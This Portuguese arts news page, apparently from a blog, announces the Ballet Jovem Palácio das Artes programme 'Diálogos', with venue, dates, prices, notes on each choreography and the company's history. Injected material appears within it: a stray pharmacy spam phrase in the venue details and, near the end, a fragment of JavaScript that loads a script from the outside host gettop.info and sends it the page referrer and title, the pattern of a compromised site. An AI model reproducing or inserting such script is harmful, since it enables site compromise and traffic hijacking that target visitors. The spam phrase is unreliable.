Balé/DançaLateralMinas GeraisProgramação

Ballet Jovem Palácio das Artes apresenta “Diálogos”

Três coreografias estão no programa da apresentação, em cartaz dias 13, 14 e 15 de abril.

SERVIÇO

 

Teatro Oi Futuro Klauss Vianna
Av. Afonso Pena, 4.100

best life rx pharmacy Dias 13, 14.04, às 21h. e 15.04, às 19h.

Ingressos: R$15,00 (inteira) / R$ 7,50 (meia)

Informações: (31) 3229-3131/ fcs.mg.gov.br

Ingressos à venda na bilheteria do teatro.

 

 

O Ballet Jovem Palácio das Artes, projeto de fomento ao jovem artista da Fundação Clóvis Salgado, apresenta o espetáculo “Diálogos”. No programa, estão três coreografias de sucesso apresentadas pelo grupo desde sua criação (“Diálogos”, “Iungo” e “Impromptu”), e, ainda, um novo fragmento criado pelo bailarino da Cia. de Dança Palácio das Artes, Peter Lavratti (“Frágil?”).

Abrindo a apresentação estará “Diálogos”, vencedora dos prêmios Sesc-Sated 2011 de Melhor Coreógrafo para Rui Moreira e Usiminas/Sinparc 2011 de Melhor Bailarino, Melhor Bailarina e Bailarino Revelação. Com trilha sonora executada ao vivo por cinco músicos formados pelo Cefar – Centro de Formação Artística da Fundação Clóvis Salgado (Gladson Braga – vibrafone, Caio Plínio – enxada, Gabriel Bruce – bateria, Natália Mitre – bongô e Abel Borges – jambay), a coreografia mostra uma interação entre a música, instrumentos e os movimentos executados pelos bailarinos. As vozes dos bailarinos, incluídas na trilha sonora, expressam o antagonismo entre luz e sombra e foram manipuladas digitalmente, servindo de base para a inserção dos instrumentos de percussão. No primeiro momento, o coreógrafo propõe uma profusão de movimentos abstratos que dialoga com a música ao vivo e desenham o espaço cênico de maneira a oferecer ao público uma gama de possibilidade de percepções poéticas, sem que se construam imagens concretas.

Em seguida será apresentado Frágil?, coreografia de dois minutos, sobre o tema relação, que pretende estabelecer um diálogo entre dança, música e imagens. Segundo a Diretora do Ballet Jovem Palácio das Artes, Andrea Maia, a “coreografia é ainda um embrião em fase de desenvolvimento, que será apresentado como um solo, e deve ser ampliada para um duo em próximas apresentações do Ballet Jovem”. E completa: “O público pode, dessa forma, acompanhar o amadurecimento de uma coreografia nos palcos”.

Iungo, de Adriaan Lutejin, dá continuidade à apresentação. Com música de F. Chopin, os bailarinos representam na coreografia a urgência dos homens em encontrar dentro do caos cotidiano um lugar “silencioso, tranquilo, confortável e seguro”.

Coreografia de estreia do Ballet Jovem, em 2007, Impromptu, de Tíndaro Silvano, encerra o espetáculo, em uma apresentação que se assemelha a uma grande festa, com os mais variados ritmos e música criada por Egberto Gismonti.

A diretora do Ballet Jovem destaca o diálogo entre as coreografias. “Conseguimos estabelecer uma ligação entre as quatro coreografias, todas conversam entre si e têm uma continuidade, sendo apresentadas sem a necessidade de intervalo, com os próprios bailarinos e peças cenográficas em cena fazendo essa transição”, afirma.

 

Ballet Jovem Palácio das Artes

Um dos grupos jovens profissionalizantes da Fundação Clóvis Salgado, o Ballet Jovem foi criado em 2007, em parceria com o Instituto Unimed-BH, com o objetivo de preparar bailarinos, com idade a partir de 15 anos, para atuar em grupos profissionais.

Ao longo dos seus cinco anos, 14 bailarinos do Ballet Jovem foram contratados por outras companhias no Brasil – como Grupo Corpo (BH), Camaleão Grupo de Dança (BH), Cia de Dança de Caxias do Sul (Caxias do Sul), Cia Mário Nascimento (BH) e Balé Teatro Guaíra (Curitiba) – e no exterior – Atlanta (EUA), Canadá e Salzburgo (Áustria).

Desde a estreia, o grupo montou 12 coreografias, apresentadas em 22 diferentes espaços de 17 cidades do Brasil. Mais de 60 mil pessoas assistiram às 78 apresentações que o Grupo realizou até hoje. Dentre estas, estão apresentações no 27º Festival Internacional de Dança da Amazônia, em Belém do Pará; Conexão Internacional da Dança, em São Paulo; Festidança, em São José dos Campos; e no Bento em Dança, em Bento Gonçalves.

Em 2010, a direção artística e de ensaios do Ballet Jovem Palácio das Artes foi assumida pela bailarina Andréa Maia. Solista do Ballet da Cidade de São Paulo por 22 anos, ao longo de sua carreira Andréa realizou trabalhos com renomados coreógrafos e professores nacionais e internacionais.

Entre as premiações recentes que a companhia recebeu, destaque para os prêmios no Usiminas/Sinparc 2011, de Melhor Bailarina para Amanda Santana (por Diálogos/Sostenuto); Melhor Bailarino para Bruno Rodrigues (por Diálogos/Sostenuto); e Bailarino Revelação, para Rodrigo Antero (por Diálogos/Sostenuto).

Em todas as apresentações do Ballet Jovem Palácio das Artes, uma cota de convites é reservada para escolas públicas, institutos filantrópicos e grupos artísticos de projetos culturais.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.